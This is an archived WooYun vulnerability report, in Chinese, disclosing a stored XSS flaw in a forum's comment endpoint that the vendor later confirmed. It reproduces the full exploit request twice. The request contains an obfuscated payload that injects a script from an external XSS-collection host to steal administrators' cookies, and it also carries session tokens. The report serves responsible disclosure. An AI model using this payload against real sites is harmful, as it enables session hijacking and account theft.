当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149217

漏洞标题:恒生某站存储型xss漏洞打哪指哪

相关厂商:hundsun.com

漏洞作者: 路人甲

提交时间:2015-10-26 11:58

修复时间:2015-12-14 15:12

公开时间:2015-12-14 15:12

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

今天是程序员节啊,今天是segmentfault的黑客马拉松啊。。注定要通宵了。。马拉松之余挖个漏洞压压精。。。
恒生某站存储型xss漏洞打哪指哪,可以打到管理员,如果管理员来看帖子或者回复的话!
请乌云管理员大大给cookie打个码= =

详细说明:

http://bbs.ihoms.com


屏幕快照 2015-10-24 下午8.40.48.png


POST /bbs/comment.jspx HTTP/1.1
Host: bbs.ihoms.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bbs.ihoms.com/bbs/cljs/7785.htm
Cookie: JSESSIONID=C813A5D1011E8D153F1EEC95B49E9BF3; 468789num=1; 468789=0; Hm_lvt_79a9c65d5515cfe58b53c7a4713c5c36=1445605317,1445690368; CNZZDATA1253385535=373586077-1445604000-http%253A%252F%252Fwww.ihoms.com%252F%7C1445690172; clientlanguage=zh_CN; Hm_lpvt_79a9c65d5515cfe58b53c7a4713c5c36=1445690394; User-Auth-Token=bb04887d5160e6eb08ca58f258f0867e; X-Auth-Token="15372414689:1445694023272:3e062d161000f256e5edc39c498181a8"; X-CN-NAME=15372414689
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
contentId=7785&path=cljs&text=</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwebxss.cn%2FHztDsb%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>%3Cdiv+id%3D%22xunlei_com_thunder_helper_plugin_d462f475-c18e-46be-bd10-327458d045bd%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cimg+src%3D%22http%3A%2F%2F111%22+alt%3D%22%22+%2F%3E


屏幕快照 2015-10-24 下午8.44.23.png


屏幕快照 2015-10-24 下午8.45.28.png


打到cookie了

屏幕快照 2015-10-24 下午8.49.10.png

漏洞证明:

http://bbs.ihoms.com


屏幕快照 2015-10-24 下午8.40.48.png


POST /bbs/comment.jspx HTTP/1.1
Host: bbs.ihoms.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bbs.ihoms.com/bbs/cljs/7785.htm
Cookie: JSESSIONID=C813A5D1011E8D153F1EEC95B49E9BF3; 468789num=1; 468789=0; Hm_lvt_79a9c65d5515cfe58b53c7a4713c5c36=1445605317,1445690368; CNZZDATA1253385535=373586077-1445604000-http%253A%252F%252Fwww.ihoms.com%252F%7C1445690172; clientlanguage=zh_CN; Hm_lpvt_79a9c65d5515cfe58b53c7a4713c5c36=1445690394; User-Auth-Token=bb04887d5160e6eb08ca58f258f0867e; X-Auth-Token="15372414689:1445694023272:3e062d161000f256e5edc39c498181a8"; X-CN-NAME=15372414689
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
contentId=7785&path=cljs&text=</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwebxss.cn%2FHztDsb%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>%3Cdiv+id%3D%22xunlei_com_thunder_helper_plugin_d462f475-c18e-46be-bd10-327458d045bd%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cimg+src%3D%22http%3A%2F%2F111%22+alt%3D%22%22+%2F%3E


屏幕快照 2015-10-24 下午8.44.23.png


屏幕快照 2015-10-24 下午8.45.28.png


打到cookie了

屏幕快照 2015-10-24 下午8.49.10.png

修复方案:

过滤。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 15:10

厂商回复:

非常感谢您的反馈,已进行处理。

最新状态:

暂无

漏洞评价:

评价